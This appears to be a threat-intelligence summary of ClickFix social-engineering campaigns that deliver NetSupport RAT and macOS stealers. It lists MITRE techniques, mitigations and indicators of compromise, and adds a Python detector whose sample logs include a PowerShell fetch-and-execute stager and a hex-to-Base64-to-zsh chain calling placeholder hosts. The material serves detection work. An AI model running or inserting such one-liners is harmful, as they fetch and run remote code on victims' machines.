Insikt Group tracked five ClickFix clusters that use fraudulent human‑verification lures to trick victims into copying and executing obfuscated commands in native tools like the Windows Run dialog and macOS Terminal. These campaigns leverage living‑off‑the‑land binaries and in‑memory execution to stage payloads such as NetSupport RAT and MacSync while operating via disposable, often Cloudflare‑protected infrastructure to maintain continuity. #ClickFix #NetSupportRAT
Keypoints
- Insikt Group identified five distinct ClickFix clusters (e.g., Intuit QuickBooks, Booking.com, Birdeye, Dual‑Platform Selection, macOS Storage Cleaning) active since at least May 2024.
- ClickFix social engineering manipulates users to run obfuscated commands manually (pastejacking or directed copy/paste) in trusted system utilities, shifting exploitation outside the browser.
- The ClickFix execution framework follows a consistent four‑stage pattern: obfuscated input, native execution via LOLBins, remote ingress from threat actor infrastructure, and in‑memory execution.
- Observed payloads include NetSupport RAT, MacSync (information stealer), Lumma Stealer, Vidar, and Odyssey Stealer, with persistence achieved via Startup shortcuts and randomized folder names.
- Clusters show operational variance (lure themes, OS detection, disposable domains behind Cloudflare) but reuse common command patterns and staging techniques, enabling a scalable “run and repeat” template.
- Recommended mitigations include disabling the Windows Run dialog via GPO, enabling PowerShell Constrained Language Mode, enforcing AppLocker/WDAC, restricting macOS shell access via MDM, and operationalizing HTML Content Analysis and Recorded Future risk lists.
MITRE Techniques
- [T1204] User Execution – Victims are socially manipulated to run commands in native tools (Run dialog, Terminal). Quote: ‘…lures victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal.’
- [T1059.001] PowerShell – Obfuscated PowerShell stagers executed with flags to bypass policy and logging (Invoke-RestMethod + iex). Quote: ‘…NoProfile and -ExecutionPolicy Bypass flags…’ and ‘…dynamically construct and invoke Invoke-RestMethod…’
- [T1059.004] Unix Shell (bash/zsh) – macOS campaigns use multi-stage decoding and shell commands (xxd, Base64, curl) executed in Terminal. Quote: ‘…Hex -> Base64 -> ZSH’ and ‘…curl -kfsSL…’
- [T1218] Signed Binary Proxy Execution (LOLBins) – Threat actors use legitimately signed utilities (for example 7z.exe) and other LOLBins to download and extract payloads. Quote: ‘…leveraged native, legitimately signed executables to download malicious payloads to a victim’s machine.’
- [T1027] Obfuscated Files or Information – Commands and scripts are heavily encoded/fragmented (case randomization, substring building) to evade static detection. Quote: ‘…input of highly encoded or fragmented strings’ and ‘obfuscated PowerShell command…’
- [T1140] Deobfuscate/Decode Files or Information – Multi-stage decoding (hex → Base64 → executable) is used on macOS to reveal final payload URLs/commands. Quote: ‘…the first example decodes a hexadecimal string to reveal a Base64‑encoded client URL…’
- [T1071.001] Application Layer Protocol: Web Protocols (HTTP) – Malware initiates C2 and staging communications via HTTP(S) requests (HTTP GET to C2 domains). Quote: ‘…neservice.exe performs an HTTP GET request to gologpoint[.]com to initiate command‑and‑control (C2) communications.’
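An added detection example, not code from the Insikt Group report: it scores process command lines for the stager traits listed above (PowerShell -NoProfile / -ExecutionPolicy Bypass, Invoke-RestMethod + iex, curl with -k, and the macOS hex -> Base64 -> zsh decode chain) so a SOC can triage EDR or Sysmon command-line telemetry. The sample lines, weights and threshold are constructed assumptions; hostnames use the reserved .invalid TLD.

```python
import re

# Weighted indicators for the ClickFix stager traits named in the report: the
# Windows PowerShell flags and fetch/exec cmdlets, and the macOS Terminal
# hex -> Base64 -> shell decode chain. Patterns are matched against lowercased text.
INDICATORS = [
    ("ps_policy_bypass", r"-(?:ex|ep|executionpolicy)\s+bypass", 2),
    ("ps_noprofile", r"-(?:nop|noprofile)\b", 1),
    ("ps_hidden_window", r"-(?:w|windowstyle)\s+hidden", 1),
    ("ps_remote_fetch", r"\b(?:invoke-restmethod|irm|invoke-webrequest|iwr)\b", 2),
    ("ps_in_memory_exec", r"\b(?:iex|invoke-expression)\b", 2),
    ("curl_insecure", r"\bcurl\b[^|;]*\s-[a-z]*k[a-z]*\b", 2),  # a curl flag bundle containing -k
    ("mac_decode_chain", r"\b(?:xxd\s+-r|base64\s+(?:-d|--decode))\b", 2),
    ("pipe_to_shell", r"\|\s*(?:zsh|bash|sh)\b", 2),
]

def score_command(cmdline: str, threshold: int = 4) -> dict:
    """Score one command line; flagged when the weighted sum reaches the (assumed) threshold."""
    text = cmdline.lower()
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"score": score, "hits": hits, "suspicious": score >= threshold}

def triage(cmdlines, threshold: int = 4):
    """Return (cmdline, result) pairs for the lines that cross the threshold."""
    results = [(line, score_command(line, threshold)) for line in cmdlines]
    return [(line, r) for line, r in results if r["suspicious"]]

# Constructed sample command lines (not taken from the report).
SAMPLE_LOGS = [
    # Windows: Run-dialog stager with policy bypass and in-memory fetch
    'powershell -w hidden -nop -ep bypass -c "iex (irm https://lure.invalid/a)"',
    # macOS: hex -> Base64 -> zsh chain; the hex is a placeholder, not a real stage
    "echo 59334e47 | xxd -r -p | base64 -D | zsh",
    # Benign administrative PowerShell: only -NoProfile fires, below threshold
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # Benign curl download without -k and without piping into a shell
    "curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz",
]

if __name__ == "__main__":
    for line, result in triage(SAMPLE_LOGS):
        print(result["score"], result["hits"], line)
```

Feed it the CommandLine field of process-creation events; the hit names tell the analyst which stage of the pattern matched, which is more useful than a bare score when tuning weights against your own baseline.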
Indicators of Compromise
- [Domains] ClickFix landing, dropper, and staging domains – nobovcs[.]com, sign-in-op-token[.]com, and 40+ other disposable domains (examples: thestayreserve[.]com, checkpulses[.]com).
- [IP Addresses] C2 and hosting infrastructure – 62[.]164[.]177[.]230 (gologpoint[.]com), 152[.]89[.]244[.]70 (NetSupport RAT C2 and related domains).
- [File Names] Staging and payload files observed – at.7z, lnk.7z, 7z.exe, neservice.exe (NetSupport RAT binary).
- [File Hashes] SHA‑256 of staged artifacts – c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50 (at.7z from nobovcs[.]com), 397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 (at.7z from checkpulses[.]com), and 2 more hashes.
Read more: https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos